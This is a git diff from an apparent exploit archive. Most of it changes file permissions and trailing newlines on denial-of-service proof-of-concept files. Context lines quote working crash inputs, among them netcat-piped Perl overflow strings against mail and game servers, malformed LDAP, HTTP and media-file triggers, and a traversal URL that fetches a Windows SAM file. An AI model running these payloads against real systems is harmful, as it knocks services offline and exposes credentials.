mode 100644 diff --git a/platforms/minix/dos/6129.txt b/platforms/minix/dos/6129.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/10004.txt b/platforms/multiple/dos/10004.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/10077.txt b/platforms/multiple/dos/10077.txt old mode 100755 new mode 100644 index 3e269b44c..b0b79216d --- a/platforms/multiple/dos/10077.txt +++ b/platforms/multiple/dos/10077.txt @@ -12,4 +12,4 @@ OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698. -ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2 \ No newline at end of file +ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2 \ No newline at end of file diff --git a/platforms/multiple/dos/1008.c b/platforms/multiple/dos/1008.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/10205.txt b/platforms/multiple/dos/10205.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/10229.txt b/platforms/multiple/dos/10229.txt old mode 100755 new mode 100644 index 80ffcde3b..6ab51214d --- a/platforms/multiple/dos/10229.txt +++ b/platforms/multiple/dos/10229.txt @@ -156,4 +156,4 @@ POC: import imageop s = '' -imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536) \ No newline at end of file +imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536) \ No newline at end of file diff --git a/platforms/multiple/dos/10327.txt b/platforms/multiple/dos/10327.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1037.c b/platforms/multiple/dos/1037.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1072.cpp b/platforms/multiple/dos/1072.cpp old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/10870.html b/platforms/multiple/dos/10870.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11106.bat b/platforms/multiple/dos/11106.bat old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11142.txt b/platforms/multiple/dos/11142.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11426.txt b/platforms/multiple/dos/11426.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11529.txt b/platforms/multiple/dos/11529.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11567.txt b/platforms/multiple/dos/11567.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11590.php b/platforms/multiple/dos/11590.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11705.c b/platforms/multiple/dos/11705.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11717.php b/platforms/multiple/dos/11717.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1176.c b/platforms/multiple/dos/1176.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/11855.c b/platforms/multiple/dos/11855.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1204.html b/platforms/multiple/dos/1204.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12109.txt b/platforms/multiple/dos/12109.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1213.c b/platforms/multiple/dos/1213.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12165.txt b/platforms/multiple/dos/12165.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12188.txt b/platforms/multiple/dos/12188.txt old mode 100755 new mode 100644 index 9114f3c10..970c6b499 --- a/platforms/multiple/dos/12188.txt +++ b/platforms/multiple/dos/12188.txt @@ -98,4 +98,4 @@ posted regularly on our website. Contact: research [at] dsecrg [dot] com -http://www.dsecrg.com \ No newline at end of file +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/multiple/dos/1233.html b/platforms/multiple/dos/1233.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12382.txt b/platforms/multiple/dos/12382.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12401.html b/platforms/multiple/dos/12401.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12491.html b/platforms/multiple/dos/12491.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12493.html b/platforms/multiple/dos/12493.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1253.html b/platforms/multiple/dos/1253.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1254.html b/platforms/multiple/dos/1254.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/12555.txt b/platforms/multiple/dos/12555.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1257.html b/platforms/multiple/dos/1257.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1331.c b/platforms/multiple/dos/1331.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1390.c b/platforms/multiple/dos/1390.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14012.txt b/platforms/multiple/dos/14012.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14121.c b/platforms/multiple/dos/14121.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14268.txt b/platforms/multiple/dos/14268.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14367.txt b/platforms/multiple/dos/14367.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14379.txt b/platforms/multiple/dos/14379.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14422.c b/platforms/multiple/dos/14422.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14537.txt b/platforms/multiple/dos/14537.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/146.c b/platforms/multiple/dos/146.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/14761.txt b/platforms/multiple/dos/14761.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15215.txt b/platforms/multiple/dos/15215.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15261.txt b/platforms/multiple/dos/15261.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15273.txt b/platforms/multiple/dos/15273.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15341.html b/platforms/multiple/dos/15341.html old mode 100755 new mode 100644 index b8a1e3057..46d2b00f9 --- a/platforms/multiple/dos/15341.html +++ b/platforms/multiple/dos/15341.html @@ -31,4 +31,4 @@ Source: https://bugzilla.mozilla.org/show_bug.cgi?id=607222 } </script> <button onclick="crashme();">Crash Me!</button> -</body></html> \ No newline at end of file +</body></html> \ No newline at end of file diff --git a/platforms/multiple/dos/15342.html b/platforms/multiple/dos/15342.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15346.c b/platforms/multiple/dos/15346.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15467.txt b/platforms/multiple/dos/15467.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15474.txt b/platforms/multiple/dos/15474.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15476.php b/platforms/multiple/dos/15476.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15498.html b/platforms/multiple/dos/15498.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15558.html b/platforms/multiple/dos/15558.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15676.txt b/platforms/multiple/dos/15676.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15707.txt b/platforms/multiple/dos/15707.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15722.txt b/platforms/multiple/dos/15722.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/15973.txt b/platforms/multiple/dos/15973.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/16079.html b/platforms/multiple/dos/16079.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/16108.txt b/platforms/multiple/dos/16108.txt old mode 100755 new mode 100644 index d3f5f2ce3..35a5da3bb --- a/platforms/multiple/dos/16108.txt +++ b/platforms/multiple/dos/16108.txt @@ -10,4 +10,4 @@ The following proof-of-concept commands are available: 1. echo -ne '<foo\0crashme' | dd conv=notrunc bs=1 seek=877862 \ of=refined-australia-blu720p-sample.mkv -2. vlc --sub-language English refined-australia-blu720p-sample.mkv \ No newline at end of file +2. vlc --sub-language English refined-australia-blu720p-sample.mkv \ No newline at end of file diff --git a/platforms/multiple/dos/16261.txt b/platforms/multiple/dos/16261.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1667.html b/platforms/multiple/dos/1667.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1671.c b/platforms/multiple/dos/1671.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/16939.txt b/platforms/multiple/dos/16939.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/170.c b/platforms/multiple/dos/170.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1709.txt b/platforms/multiple/dos/1709.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/17120.c b/platforms/multiple/dos/17120.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/17140.txt b/platforms/multiple/dos/17140.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1716.html b/platforms/multiple/dos/1716.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/17201.php b/platforms/multiple/dos/17201.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/17549.txt b/platforms/multiple/dos/17549.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1801.txt b/platforms/multiple/dos/1801.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1802.html b/platforms/multiple/dos/1802.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18025.txt b/platforms/multiple/dos/18025.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18116.html b/platforms/multiple/dos/18116.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1819.txt b/platforms/multiple/dos/1819.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1820.txt b/platforms/multiple/dos/1820.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18370.txt b/platforms/multiple/dos/18370.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18600.txt b/platforms/multiple/dos/18600.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18601.txt b/platforms/multiple/dos/18601.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1867.html b/platforms/multiple/dos/1867.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18754.php b/platforms/multiple/dos/18754.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18756.txt b/platforms/multiple/dos/18756.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18758.txt b/platforms/multiple/dos/18758.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18877.txt b/platforms/multiple/dos/18877.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18890.txt b/platforms/multiple/dos/18890.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18918.txt b/platforms/multiple/dos/18918.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18919.txt b/platforms/multiple/dos/18919.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/18920.txt b/platforms/multiple/dos/18920.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19098.txt b/platforms/multiple/dos/19098.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19212.txt b/platforms/multiple/dos/19212.txt old mode 100755 new mode 100644 index 9df4f31ba..e6ee579b7 --- a/platforms/multiple/dos/19212.txt +++ b/platforms/multiple/dos/19212.txt @@ -6,4 +6,4 @@ A malicious user can create a malformed like ",1" entry in the counter.log file A similar vulnerability exists if a user requests a URL of the form "http://www.example.com/scripts/counter.exe?AAAAA" with over 2200 A's. -All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued. \ No newline at end of file +All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued. \ No newline at end of file diff --git a/platforms/multiple/dos/19225.txt b/platforms/multiple/dos/19225.txt old mode 100755 new mode 100644 index 9f2871396..3fe309cca --- a/platforms/multiple/dos/19225.txt +++ b/platforms/multiple/dos/19225.txt @@ -13,4 +13,4 @@ One an attacker has access to on such machine, using Compaq's HTTP Auto-Discover The web agent service also appears to be vulnerable a a denial of service. By sending it a request for over 223 bytes long ("AAAA...") the service will fail with an access violation. http://vulnerable-NT.com:2301/../../../winnt/repair/sam._ -http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf \ No newline at end of file +http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf \ No newline at end of file diff --git a/platforms/multiple/dos/19230.txt b/platforms/multiple/dos/19230.txt old mode 100755 new mode 100644 index 5612df231..de5f555cf --- a/platforms/multiple/dos/19230.txt +++ b/platforms/multiple/dos/19230.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/288/info Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press <Enter>". -Connect to tcp 5631. At the Please press <Enter> prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%. \ No newline at end of file +Connect to tcp 5631. At the Please press <Enter> prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%. \ No newline at end of file diff --git a/platforms/multiple/dos/19290.txt b/platforms/multiple/dos/19290.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19368.sh b/platforms/multiple/dos/19368.sh index 3fa37347e..884f403dc 100755 --- a/platforms/multiple/dos/19368.sh +++ b/platforms/multiple/dos/19368.sh @@ -20,4 +20,4 @@ text of message . 250 Message received OK. quit -221 GoodBye \ No newline at end of file +221 GoodBye \ No newline at end of file diff --git a/platforms/multiple/dos/1937.html b/platforms/multiple/dos/1937.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19377.txt b/platforms/multiple/dos/19377.txt old mode 100755 new mode 100644 index 5ddfaa524..3e2f43fd9 --- a/platforms/multiple/dos/19377.txt +++ b/platforms/multiple/dos/19377.txt @@ -7,4 +7,4 @@ Telnet to target machine, port 143 * OK IMAP4 Server (IMail 4.06) X LOGIN glob1 glob2 -Where glob1 is 1200 characters and glob2 is 1300 characters. \ No newline at end of file +Where glob1 is 1200 characters and glob2 is 1300 characters. \ No newline at end of file diff --git a/platforms/multiple/dos/19378.txt b/platforms/multiple/dos/19378.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19379.txt b/platforms/multiple/dos/19379.txt old mode 100755 new mode 100644 index 2394045d4..e0085c5e5 --- a/platforms/multiple/dos/19379.txt +++ b/platforms/multiple/dos/19379.txt @@ -7,4 +7,4 @@ Telnet to target machine, port 8181 Send: glob1 hit enter twice -Where glob1 is 2045 characters. \ No newline at end of file +Where glob1 is 2045 characters. \ No newline at end of file diff --git a/platforms/multiple/dos/19380.txt b/platforms/multiple/dos/19380.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19382.txt b/platforms/multiple/dos/19382.txt old mode 100755 new mode 100644 index 4de416df6..722805cc2 --- a/platforms/multiple/dos/19382.txt +++ b/platforms/multiple/dos/19382.txt @@ -6,4 +6,4 @@ Telnet to target machine, port 43 Send glob1 -Where glob1 is 1000 characters. \ No newline at end of file +Where glob1 is 1000 characters. \ No newline at end of file diff --git a/platforms/multiple/dos/19457.txt b/platforms/multiple/dos/19457.txt old mode 100755 new mode 100644 index b2b064b83..cfd97a1e4 --- a/platforms/multiple/dos/19457.txt +++ b/platforms/multiple/dos/19457.txt @@ -12,4 +12,4 @@ Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes) ...10,000 lines Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes) -I sent twice above request sets. Then somehow victim IIS got memory leak after these requests. Of course, it can not respond any request any more. If you try this, you should see memory increase through performance monitor. You would see memory increase even after those requests finished already. It will stop when you got shortage of virtual memory. After that, you might not be able to restart web service and you would restart computer. I tried this against Japanese and English version of Windows NT. \ No newline at end of file +I sent twice above request sets. Then somehow victim IIS got memory leak after these requests. Of course, it can not respond any request any more. If you try this, you should see memory increase through performance monitor. You would see memory increase even after those requests finished already. It will stop when you got shortage of virtual memory. After that, you might not be able to restart web service and you would restart computer. I tried this against Japanese and English version of Windows NT. \ No newline at end of file diff --git a/platforms/multiple/dos/1947.c b/platforms/multiple/dos/1947.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19482.txt b/platforms/multiple/dos/19482.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19536.txt b/platforms/multiple/dos/19536.txt old mode 100755 new mode 100644 index fa8b04dab..c4e1a5f80 --- a/platforms/multiple/dos/19536.txt +++ b/platforms/multiple/dos/19536.txt @@ -11,4 +11,4 @@ This is a bug with the nph-test-cgi script and _not_ the server itself. Enter the URL: <http://yourwebserver.com/cgi-bin/nph-test-cgi?*> Replace <yourwebserver.com> with the hostname of a server running a web -daemon near you. \ No newline at end of file +daemon near you. \ No newline at end of file diff --git a/platforms/multiple/dos/19571.c b/platforms/multiple/dos/19571.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/1972.txt b/platforms/multiple/dos/1972.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19780.txt b/platforms/multiple/dos/19780.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19920.c b/platforms/multiple/dos/19920.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19965.txt b/platforms/multiple/dos/19965.txt old mode 100755 new mode 100644 index bd09f02a5..6b83cdeba --- a/platforms/multiple/dos/19965.txt +++ b/platforms/multiple/dos/19965.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1246/info By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality. -http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$ \ No newline at end of file +http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$ \ No newline at end of file diff --git a/platforms/multiple/dos/19977.txt b/platforms/multiple/dos/19977.txt old mode 100755 new mode 100644 index ca25ab6c7..d35f626c2 --- a/platforms/multiple/dos/19977.txt +++ b/platforms/multiple/dos/19977.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1288/info RealServer 7.0 will crash if it receives a request for a specific file with an unspecified variable value. -http://targetIP:port/viewsource/template.html? \ No newline at end of file +http://targetIP:port/viewsource/template.html? \ No newline at end of file diff --git a/platforms/multiple/dos/19984.c b/platforms/multiple/dos/19984.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/19996.txt b/platforms/multiple/dos/19996.txt old mode 100755 new mode 100644 index aad049b25..fb5fef990 --- a/platforms/multiple/dos/19996.txt +++ b/platforms/multiple/dos/19996.txt @@ -8,4 +8,4 @@ Restarting the application would be required in order to regain normal functiona The Administrator login page can be typically accessed via: http://target/cfide/administrator/index.cfm -Modify the field size and POST action in the HTML tags to allow for the input of a character string consisting of over 40 000 characters. \ No newline at end of file +Modify the field size and POST action in the HTML tags to allow for the input of a character string consisting of over 40 000 characters. \ No newline at end of file diff --git a/platforms/multiple/dos/20052.txt b/platforms/multiple/dos/20052.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20098.txt b/platforms/multiple/dos/20098.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20229.txt b/platforms/multiple/dos/20229.txt old mode 100755 new mode 100644 index 3376a83aa..b3408cf5c --- a/platforms/multiple/dos/20229.txt +++ b/platforms/multiple/dos/20229.txt @@ -8,4 +8,4 @@ Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters) resulted in the following IBMHTTPD log entry: [Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation -Fault (11) \ No newline at end of file +Fault (11) \ No newline at end of file diff --git a/platforms/multiple/dos/20239.txt b/platforms/multiple/dos/20239.txt old mode 100755 new mode 100644 index fc2dc8522..98c25a1ea --- a/platforms/multiple/dos/20239.txt +++ b/platforms/multiple/dos/20239.txt @@ -6,4 +6,4 @@ HP Openview Node Manager can be compromised due to an unchecked buffer. By sendi Successful exploitation, depending on the data entered, will allow the execution of arbitrary code. -http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid=<string of characters consisting of 136 bytes> \ No newline at end of file +http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid=<string of characters consisting of 136 bytes> \ No newline at end of file diff --git a/platforms/multiple/dos/20336.txt b/platforms/multiple/dos/20336.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20531.txt b/platforms/multiple/dos/20531.txt old mode 100755 new mode 100644 index 3c6b1047b..9d62a0d25 --- a/platforms/multiple/dos/20531.txt +++ b/platforms/multiple/dos/20531.txt @@ -6,4 +6,4 @@ Both IBM HTTP Server and Websphere are subject to a denial of service. This is c GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n -This request must be made multiple times before the system will freeze. \ No newline at end of file +This request must be made multiple times before the system will freeze. \ No newline at end of file diff --git a/platforms/multiple/dos/20534.txt b/platforms/multiple/dos/20534.txt old mode 100755 new mode 100644 index a3ca5e280..02db1b323 --- a/platforms/multiple/dos/20534.txt +++ b/platforms/multiple/dos/20534.txt @@ -10,4 +10,4 @@ Make to connections to the irc server second being the clone of other. On second ConferenceRoom 1.8.2: -"/ns buddy on" can't run, cuz professional edt. can't support "buddy" command. Register it one channel, and type it commands "/ns set authorize chanlists on", "/cs aop <#ChannelName> add <NickName>", "/ns auth accept 1". and the services crashes. \ No newline at end of file +"/ns buddy on" can't run, cuz professional edt. can't support "buddy" command. Register it one channel, and type it commands "/ns set authorize chanlists on", "/cs aop <#ChannelName> add <NickName>", "/ns auth accept 1". and the services crashes. \ No newline at end of file diff --git a/platforms/multiple/dos/20558.txt b/platforms/multiple/dos/20558.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20610.txt b/platforms/multiple/dos/20610.txt old mode 100755 new mode 100644 index ea7d97c5c..de68e76ea --- a/platforms/multiple/dos/20610.txt +++ b/platforms/multiple/dos/20610.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2337/info A denial of service condition exists in the JRun web application server. Requesting multiple malformed URLs by way of the java servlet, will cause the JRun application server to stop responding. -http://target/servlet/........... (many "."s) \ No newline at end of file +http://target/servlet/........... (many "."s) \ No newline at end of file diff --git a/platforms/multiple/dos/20659.txt b/platforms/multiple/dos/20659.txt old mode 100755 new mode 100644 index d93353334..997bf39d1 --- a/platforms/multiple/dos/20659.txt +++ b/platforms/multiple/dos/20659.txt @@ -21,4 +21,4 @@ Password: ftp> ls .. 200 Port command successful. 550 Opening ASCII mode data connection for file list. (/..) --> ftp get:Connection reset by peer \ No newline at end of file +-> ftp get:Connection reset by peer \ No newline at end of file diff --git a/platforms/multiple/dos/2073.c b/platforms/multiple/dos/2073.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20792.txt b/platforms/multiple/dos/20792.txt old mode 100755 new mode 100644 index 14488a639..034a52eb9 --- a/platforms/multiple/dos/20792.txt +++ b/platforms/multiple/dos/20792.txt @@ -4,4 +4,4 @@ Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot. -perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110 \ No newline at end of file +perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110 \ No newline at end of file diff --git a/platforms/multiple/dos/20810.c b/platforms/multiple/dos/20810.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20811.cpp b/platforms/multiple/dos/20811.cpp old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20813.c b/platforms/multiple/dos/20813.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20853.php b/platforms/multiple/dos/20853.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/20973.txt b/platforms/multiple/dos/20973.txt old mode 100755 new mode 100644 index d8cecf85f..484538ef7 --- a/platforms/multiple/dos/20973.txt +++ b/platforms/multiple/dos/20973.txt @@ -6,4 +6,4 @@ Icecast does not sufficiently sanitize user-supplied input, or sanely handle une http://localhost:8000/file// -NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service. \ No newline at end of file +NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service. \ No newline at end of file diff --git a/platforms/multiple/dos/20997.c b/platforms/multiple/dos/20997.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21012.c b/platforms/multiple/dos/21012.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21041.txt b/platforms/multiple/dos/21041.txt old mode 100755 new mode 100644 index 3d331ed79..8639c3884 --- a/platforms/multiple/dos/21041.txt +++ b/platforms/multiple/dos/21041.txt @@ -10,4 +10,4 @@ Post 100+ IMG Tags, each with a unique 'mailto:' link. <img src="mailto:johndoe1@example.com"> <img src="mailto:johndoe2@example.com"> -etc. \ No newline at end of file +etc. \ No newline at end of file diff --git a/platforms/multiple/dos/21042.txt b/platforms/multiple/dos/21042.txt old mode 100755 new mode 100644 index 3a079c532..6ca12ad6c --- a/platforms/multiple/dos/21042.txt +++ b/platforms/multiple/dos/21042.txt @@ -4,4 +4,4 @@ Quake3 Arena Server is a software package designed to host multiple Quake 3 play A vulnerability exists in this software that can allow a malicious user to remotely crash a Quake 3 Server. Execution of arbitrary code may be possible as well. -perl -wle 'printf("%c%c%c%c%s",255,255,255,255,"connectre")' | nc -u 1.1.1.1 \ No newline at end of file +perl -wle 'printf("%c%c%c%c%s",255,255,255,255,"connectre")' | nc -u 1.1.1.1 \ No newline at end of file diff --git a/platforms/multiple/dos/21126.c b/platforms/multiple/dos/21126.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21181.txt b/platforms/multiple/dos/21181.txt old mode 100755 new mode 100644 index 19f1827eb..c74375c78 --- a/platforms/multiple/dos/21181.txt +++ b/platforms/multiple/dos/21181.txt @@ -10,4 +10,4 @@ Malicious webmasters may construct webpages which exploit this vulnerability. for(i=0;i<100000000;i++) { document.write("<img src=http://fakehost.com/"+i+".gif>"); } -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/multiple/dos/21213.txt b/platforms/multiple/dos/21213.txt old mode 100755 new mode 100644 index 21e292325..f127a6807 --- a/platforms/multiple/dos/21213.txt +++ b/platforms/multiple/dos/21213.txt @@ -4,4 +4,4 @@ Snort is a network intrusion detection system (IDS). It is originally written fo An error exists in some versions of Snort. If a maliciously constructed ICMP packet is received, the daemon will crash. This is caused because Snort erroneously defines the minimum ICMP header size as 8 bytes. A restart will be required to regain normally functionality. -ping -c1 -s1 host \ No newline at end of file +ping -c1 -s1 host \ No newline at end of file diff --git a/platforms/multiple/dos/21232.c b/platforms/multiple/dos/21232.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21337.c b/platforms/multiple/dos/21337.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21413.txt b/platforms/multiple/dos/21413.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21539.c b/platforms/multiple/dos/21539.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21544.html b/platforms/multiple/dos/21544.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21572.txt b/platforms/multiple/dos/21572.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21575.txt b/platforms/multiple/dos/21575.txt old mode 100755 new mode 100644 index e16445e33..ef8c49f69 --- a/platforms/multiple/dos/21575.txt +++ b/platforms/multiple/dos/21575.txt @@ -6,4 +6,4 @@ In a regular .htaccess file: SetEnv DATE_LOCALE "X" -where the character X represents a string of 12288 bytes. \ No newline at end of file +where the character X represents a string of 12288 bytes. \ No newline at end of file diff --git a/platforms/multiple/dos/21593.txt b/platforms/multiple/dos/21593.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21782.txt b/platforms/multiple/dos/21782.txt old mode 100755 new mode 100644 index 6174945a2..b1169ef77 --- a/platforms/multiple/dos/21782.txt +++ b/platforms/multiple/dos/21782.txt @@ -4,4 +4,4 @@ The Oracle TNS Listener program is a remote connectivity service for Oracle Data Under some circumstances, it may be possible for a remote user to crash TNS Listener service. By connecting to the service, and issuing the SERVICE_CURLOAD command, the service becomes unstable. It has been reported that this will cause the listenering to stop responding to connections, and also crash after the command is issued. -"(CONNECT_DATA=(COMMAND=SERVICE_CURLOAD))" \ No newline at end of file +"(CONNECT_DATA=(COMMAND=SERVICE_CURLOAD))" \ No newline at end of file diff --git a/platforms/multiple/dos/2179.c b/platforms/multiple/dos/2179.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/21911.txt b/platforms/multiple/dos/21911.txt old mode 100755 new mode 100644 index 8a3d14166..6f67f1163 --- a/platforms/multiple/dos/21911.txt +++ 